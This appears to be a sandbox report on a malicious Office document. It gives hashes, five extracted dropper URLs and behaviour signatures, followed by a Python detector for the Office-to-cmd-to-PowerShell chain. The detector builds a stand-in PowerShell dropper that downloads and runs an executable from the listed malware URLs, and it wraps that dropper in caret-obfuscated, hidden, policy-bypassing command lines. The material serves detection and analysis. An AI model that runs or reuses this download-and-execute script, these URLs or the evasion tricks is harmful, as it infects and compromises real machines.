General

  • Target

    9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

  • Size

    173KB

  • Sample

    210519-dmpssjm4p2

  • MD5

    b591371308b94b1ca5545841fb64fbd7

  • SHA1

    424d456e7e8a09a1cddb821b8f7eeb9b0dc3effb

  • SHA256

    9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

  • SHA512

    ff0d0e352d05232c62642e576cc9e14e05630dfc59bff0b7c08399a108ced404824a76150561a1eb61ae28d856bcc6d46bb9848ad8497d6fb68778b7ac15f0e0

Score
10/10

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs (exe.dropper)

    http://suidi.com/IdWaI
    http://spprospekt.com.br/WCH
    http://sportpony.ch/R1c
    http://regenerationcongo.com/imiK6
    http://procoach.jp/newfolde_r/Q8G8Tdg

Targets

    • Target

      9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

    • Size

      173KB

    • MD5

      b591371308b94b1ca5545841fb64fbd7

    • SHA1

      424d456e7e8a09a1cddb821b8f7eeb9b0dc3effb

    • SHA256

      9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

    • SHA512

      ff0d0e352d05232c62642e576cc9e14e05630dfc59bff0b7c08399a108ced404824a76150561a1eb61ae28d856bcc6d46bb9848ad8497d6fb68778b7ac15f0e0

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Obfuscated cmd.exe command-line

      An obfuscated cmd.exe command-line is typically used to evade detection.
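The three signatures above, and the extracted ps1 dropper config, describe one chain: an Office document spawns cmd.exe, cmd.exe spawns PowerShell with an obfuscated command line, and the PowerShell script walks a list of download URLs. The script below is an added example, not part of the sandbox report and not code recovered from the sample. It runs that detection over a constructed process tree: it strips cmd.exe caret escaping, pulls the base64 payload out of `-e`/`-ec`/`-enc…`/`-EncodedCommand`, decodes the UTF-16LE script and extracts the URLs, then matches them against the five exe.dropper URLs the report lists. The command lines, the `-EncodedCommand` usage and the `'url@url@...'.Split('@')` idiom are assumptions about the dropper's shape; only the five URLs come from the report.

```python
"""Added example: detection logic for Office -> cmd.exe -> powershell.exe with an
encoded dropper. Constructed telemetry; not the sandbox's or the sample's code."""
import base64
import re

# The five URLs the sandbox extracted from the deobfuscated ps1 (from the report).
REPORT_DROPPER_URLS = {
    "http://suidi.com/IdWaI",
    "http://spprospekt.com.br/WCH",
    "http://sportpony.ch/R1c",
    "http://regenerationcongo.com/imiK6",
    "http://procoach.jp/newfolde_r/Q8G8Tdg",
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\"@;]+")

def build_dropper_script(urls):
    """Constructed stand-in for the deobfuscated ps1 (assumed shape): try each URL in turn."""
    joined = "@".join(urls)
    return (f"$u='{joined}'.Split('@');foreach($x in $u){{try{{"
            "(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');"
            "Start-Process ($env:TEMP+'\\a.exe');break}catch{}}")

def encode_command(script):
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decaret(cmdline):
    """Undo cmd.exe caret escaping ('p^o^w^e^r' -> 'power'); cmd.exe removes the
    carets before the child process ever sees the string."""
    return cmdline.replace("^", "")

def encoded_payload(cmdline):
    """Return the argument of -e / -ec / -enc... / -EncodedCommand, or None.
    powershell.exe accepts any unambiguous prefix of the parameter name and
    the explicit '-ec' alias, so match all of them."""
    toks = decaret(cmdline).split()
    for i, t in enumerate(toks[:-1]):
        name = t[1:].lower() if t.startswith("-") else None
        if name and (name in ("e", "ec")
                     or (len(name) >= 3 and "encodedcommand".startswith(name))):
            return toks[i + 1]
    return None

def is_obfuscated(cmdline):
    """Heuristics behind 'obfuscated cmd.exe command-line': caret-spliced tokens,
    %VAR:~n,m% substring expansion, or an encoded PowerShell payload."""
    return (cmdline.count("^") >= 3
            or re.search(r"%\w+:~-?\d+(?:,-?\d+)?%", cmdline) is not None
            or encoded_payload(cmdline) is not None)

def dropper_urls(cmdline):
    """Decode the -EncodedCommand payload (if any) and pull every URL out of it."""
    b64 = encoded_payload(cmdline)
    if b64 is None:
        return set()
    try:
        script = base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return set()
    return set(URL_RE.findall(script))

def analyse(events):
    """events: dicts with pid, ppid, image, cmdline. Returns one finding per
    scripting/LOLBin process whose ancestry (<= 3 hops) contains an Office app."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() not in LOLBIN_CHILDREN:
            continue
        chain, cur = [], by_pid.get(e["ppid"])
        while cur is not None and len(chain) < 3:
            chain.append(cur["image"].lower())
            cur = by_pid.get(cur["ppid"])
        if not any(p in OFFICE_PARENTS for p in chain):
            continue
        findings.append({
            "pid": e["pid"],
            "chain": " -> ".join(reversed(chain)) + " -> " + e["image"].lower(),
            "obfuscated": is_obfuscated(e["cmdline"]),
            "urls": dropper_urls(e["cmdline"]),
        })
    return findings

# Constructed telemetry: Word opens the maldoc, the macro runs a caret-obfuscated
# cmd.exe line, which launches PowerShell with the encoded dropper script.
ENCODED = encode_command(build_dropper_script(sorted(REPORT_DROPPER_URLS)))
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",  "cmdline": '"WINWORD.EXE" /n invoice.doc'},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",
     "cmdline": "cmd /c p^o^w^e^r^s^h^e^l^l -w hidden -ep bypass -e " + ENCODED},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -e " + ENCODED},
    {"pid": 500, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd /c dir"},  # benign
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f["pid"], f["chain"], "obfuscated" if f["obfuscated"] else "plain")
        for url in sorted(f["urls"] & REPORT_DROPPER_URLS):
            print("   matches report IOC:", url)
```

Both the cmd.exe and the powershell.exe events are flagged: cmd.exe by the caret density, powershell.exe by the encoded payload, and the decoded script yields all five report URLs. The benign `cmd /c dir` under explorer.exe is not reported, because no Office process sits in its ancestry. The encoded-parameter matcher works on the de-careted string on purpose: a caret-spliced `-e^n^c` is what cmd.exe hands to PowerShell as `-enc`, so matching the raw string would miss it.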

MITRE ATT&CK Enterprise v6